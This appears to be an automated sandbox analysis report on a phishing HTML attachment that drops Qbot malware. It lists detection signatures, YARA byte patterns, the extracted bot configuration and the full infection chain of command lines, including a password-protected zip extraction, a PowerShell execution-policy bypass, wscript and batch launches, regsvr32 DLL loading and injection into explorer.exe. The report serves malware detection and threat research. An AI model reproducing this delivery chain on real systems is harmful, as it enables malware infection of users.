Windows Analysis Report
Calculation#8785(Sep16).html

Overview

General Information

Sample Name: Calculation#8785(Sep16).html
Analysis ID: 704342
MD5: 7098151184920994fe048b20a9fbd57c
SHA1: c0c017f604912f8d5f5d5104512fbca9b81c974b
SHA256: fcc6ca0e284f527bfa0c8c9bc25f81389532cf7a2ddfd3e8c01ae2e7feb39ad1
Tags: html

Detection

Qbot
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected Qbot
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Wscript starts Powershell (via cmd or directly)
Injects code into the Windows Explorer (explorer.exe)
Uses 7zip to decompress a password protected archive
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Tries to load missing DLLs
Found evasive API chain checking for process token information
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • chrome.exe (PID: 6132 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 5224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1800,i,15047504098167429117,11276190225124185928,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • unarchiver.exe (PID: 6748 cmdline: C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip MD5: 9DE2E060A2985A232D8B96F9EC847A19)
      • 7za.exe (PID: 7012 cmdline: C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1316 cmdline: cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 3680 cmdline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • wscript.exe (PID: 5064 cmdline: "C:\Windows\System32\WScript.exe" "E:\more\seeSay.js" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • cmd.exe (PID: 4268 cmdline: C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • regsvr32.exe (PID: 6912 cmdline: regsvr32 more/veryAs.db MD5: 426E7499F6A7346F0410DEAD0805586B)
            • explorer.exe (PID: 712 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • chrome.exe (PID: 5392 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Calculation#8785(Sep16).html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
{"Bot id": "obama204", "Campaign": "1663313119", "Version": "403.892"}
Source | Rule | Description | Author | Strings
0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
  • 0x10f6c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Qbot_3074a8d4 | unknown | unknown
  • 0x1ca14:$a4: %u;%u;%u;
  • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
  • 0x1cdd8:$a6: %u&%s&%u
  • 0x8c6d:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
  • 0x8fab:$set_key: 8D 87 00 04 00 00 50 56 E8 22 16 00 00 59 8B D0 8B CE E8
  • 0x32d9:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
  • 0x2d31:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 22 F0 FF FF 83 C4 10
  • 0xc8ff:$generate_random_alpha_num_string: 57 E8 D5 DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 DD 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
  • 0x10f6c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
Source | Rule | Description | Author | Strings
27.2.regsvr32.exe.31b0000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
27.2.regsvr32.exe.31b0000.0.raw.unpack | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
  • 0x10f6c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
27.2.regsvr32.exe.31b0000.0.raw.unpack | Windows_Trojan_Qbot_3074a8d4 | unknown | unknown
  • 0x1ca14:$a4: %u;%u;%u;
  • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
  • 0x1cdd8:$a6: %u&%s&%u
  • 0x8c6d:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
  • 0x8fab:$set_key: 8D 87 00 04 00 00 50 56 E8 22 16 00 00 59 8B D0 8B CE E8
  • 0x32d9:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
  • 0x2d31:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 22 F0 FF FF 83 C4 10
  • 0xc8ff:$generate_random_alpha_num_string: 57 E8 D5 DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 DD 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
29.0.explorer.exe.32e0000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
29.0.explorer.exe.32e0000.0.raw.unpack | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
  • 0x10f6c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
          No Sigma rule has matched
          No Snort rule has matched

          Source: 27.2.regsvr32.exe.31b0000.0.unpack | Malware Configuration Extractor: Qbot {"Bot id": "obama204", "Campaign": "1663313119", "Version": "403.892"}

          Phishing

          Source: file:///C:/Users/user/Desktop/Calculation%238785(Sep16).html | Matcher: Template: adobe matched with high similarity
          Source: C:\Windows\SysWOW64\unarchiver.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google\GoogleUpdater
          Source: Binary string: amstream.pdb source: explorer.exe, 0000001D.00000002.722273737.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: explorer.exe, 0000001D.00000002.722273737.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 29_2_032EC134 FindFirstFileW,FindNextFileW, 29_2_032EC134
          Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 04EE1969h 9_2_04EE172F
          Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 04EE0B1Ch 9_2_04EE02C8
          Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 04EE11B7h 9_2_04EE02C8
          Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 04EE0B1Ch 9_2_04EE0A7C
          Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 04EE0B1Ch 9_2_04EE0AB7
          Source: Joe Sandbox View | IP Address: 239.255.255.250 239.255.255.250
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
          Source: Calculation#8785(Sep16).html | String found in binary or memory: https://getbootstrap.com/)
          Source: Calculation#8785(Sep16).html | String found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
          Source: unknown | HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __Secure-ENID=6.SE=Md0Ynyf9ahpkx1CxTGF0vY434NJ6ymH-gDI2Tl5Ly-NQYGPjnNfggtiFRMAwx4JRDOC_gavEPcD5cTBJzUgtbJobmBEuJ8xi2UuotxvOZgApoqSIg1b0RP47U08XG8Bz_SExSzKy0ETSsajbToDlYyFsxfI93p7AyRAd-OeIBA0; CONSENT=PENDING+070
          Source: unknown | DNS traffic detected: queries for: accounts.google.com
          Source: global traffic | HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda X-Goog-Update-Updater: chromecrx-104.0.5112.81 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 29_2_032E5CC4 GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,GetCursorInfo,CopyIcon,GetIconInfo,GetObjectW,DrawIconEx,SelectObject,GetObjectW,GetDIBits,DeleteDC,DeleteDC,DeleteObject, 29_2_032E5CC4
          Source: unarchiver.exe, 00000009.00000002.440908695.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          System Summary

          Source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 29.0.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 29.0.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 29.2.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 29.2.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 29.2.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 29.2.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 27.2.regsvr32.exe.31b0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 27.2.regsvr32.exe.31b0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 29.0.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 29.0.explorer.exe.32e0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"
          Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip
          Source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 9_2_04EE02C8 9_2_04EE02C8
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032F678F 29_2_032F678F
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032F63D0 29_2_032F63D0
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032F360B 29_2_032F360B
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032F2A06 29_2_032F2A06
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032F82C0 29_2_032F82C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
          Source: C:\Windows\SysWOW64\unarchiver.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1800,i,15047504098167429117,11276190225124185928,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
          Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Calculation#8785(Sep16).html
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip
          Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip
          Source: C:\Windows\SysWOW64\7za.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso"
          Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "E:\more\seeSay.js"
          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 more/veryAs.db
          Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\unarchiver.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\Downloads\b61d9098-6d35-4a63-8391-2365d3e4d4ae.tmp
          Source: C:\Windows\SysWOW64\unarchiver.exe File created: C:\Users\user\AppData\Local\Temp\unarchiver.log
          Source: classification engine Classification label: mal84.phis.troj.evad.winHTML@48/9@5/6
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032EE503 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 29_2_032EE503
          Source: C:\Windows\SysWOW64\unarchiver.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\SysWOW64\unarchiver.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\unarchiver.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\unarchiver.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3960:120:WilError_01
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\GoogleUpdater
          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"
          Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\unarchiver.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater
          Source: Binary string: amstream.pdb source: explorer.exe, 0000001D.00000002.722273737.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: explorer.exe, 0000001D.00000002.722273737.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032FCB95 push esi; iretd 29_2_032FCB9A
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032FAEB6 push cs; iretd 29_2_032FAE8A
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032FADB4 push cs; iretd 29_2_032FAE8A
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032FB066 push ebx; ret 29_2_032FB067
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_032EEFB8 LoadLibraryA,GetProcAddress, 29_2_032EEFB8

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 712 base: 93F380 value: E9 B8 6E 9A 02
          Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6656 Thread sleep count: 57 > 30
          Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6944 Thread sleep time: -922337203685477s >= -30000s
